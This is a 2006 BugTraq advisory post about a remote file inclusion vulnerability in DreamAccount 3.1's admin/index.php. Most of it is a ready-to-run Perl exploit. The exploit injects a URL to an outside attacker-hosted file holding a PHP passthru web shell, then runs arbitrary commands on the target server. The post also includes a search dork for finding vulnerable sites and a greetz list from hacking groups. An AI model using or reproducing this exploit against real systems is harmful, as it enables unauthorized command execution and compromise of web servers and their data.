BugTraq
DREAMACCOUNT V3.1 Remote Command Execution Exploit Jun 23 2006 03:05PM
KARKOR23 hotmail com
----------------------------------------------------

DREAMACCOUNT V3.1 Command Execution Exploit

----------------------------------------------------

Discovered By CrAsh_oVeR_rIdE(Arabian Security Team)

Coded By Drago84(Exclusive Security Team)

----------------------------------------------------

site of script:http://dreamcost.com

----------------------------------------------------

Vulnerable: DREAMACCOUNT V3.1

----------------------------------------------------

vulnerable file :

------------------

/admin/index.php

----------------------------------------------------

vulnerable code:

----------------------------------------------------

require($path . "setup.php");

require($path . "functions.php");

require($path . "payment_processing.inc.php");

$path parameter File inclusion

----------------------------------------------------

#!/usr/bin/perl

use HTTP::Request;

use LWP::UserAgent;

print "\n=====================================================================
========\r\n";

print " * Dreamaccount Remote Command Execution 23/06/06 *\r\n";

print "=======================================================================
======\r\n";

print "[*] dork:\"powered by DreamAccount 3.1\"\n";

print "[*] Coded By : Drago84 \n";

print "[*] Discovered by CrAsH_oVeR_rIdE\n";

print "[*] Use <site> <dir_Dream> <eval site> <cmd>\n";

print " Into the Eval Site it must be:\n\n";

print " Exclusive <?php passthru($_GET[cmd]); ?> /Exclusive";

if (@ARGV < 4)

{

print "\n\n[*] usage: perl dream.pl <site> <dir dream> <eval site> <cmd>\n";

print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/ http://www.site.org/doc.jpg id\n";

print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";

exit();

}

my $dir=$ARGV[1];

my $host=$ARGV[0];

my $eval=$ARGV[2];

my $cmd=$ARGV[3];

my $url2=$host.$dir."/admin/index.php?path=".$eval."?&cmd=".$cmd;

print "\n";

my $req=HTTP::Request->new(GET=>$url2);

my $ua=LWP::UserAgent->new();

$ua->timeout(10);

my $response=$ua->request($req);

if ($response->is_success) {

print "\n\nResult of:".$cmd."\n";

my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)\/Exclusive}smx );

printf $1;

$response->content;

print "\n";

}

------------------------------------------------------------------------
----------------------------

Discovered By CrAsh_oVeR_rIdE

Coded By Drago84

E-mail:KARKOR23 (at) hotmail (dot) com [email concealed]

Site:www.lezr.com

Greetz:KING-HACKER,YOUNG_HACKER

,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr
.hcR AND ALL LEZR.COM Member

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus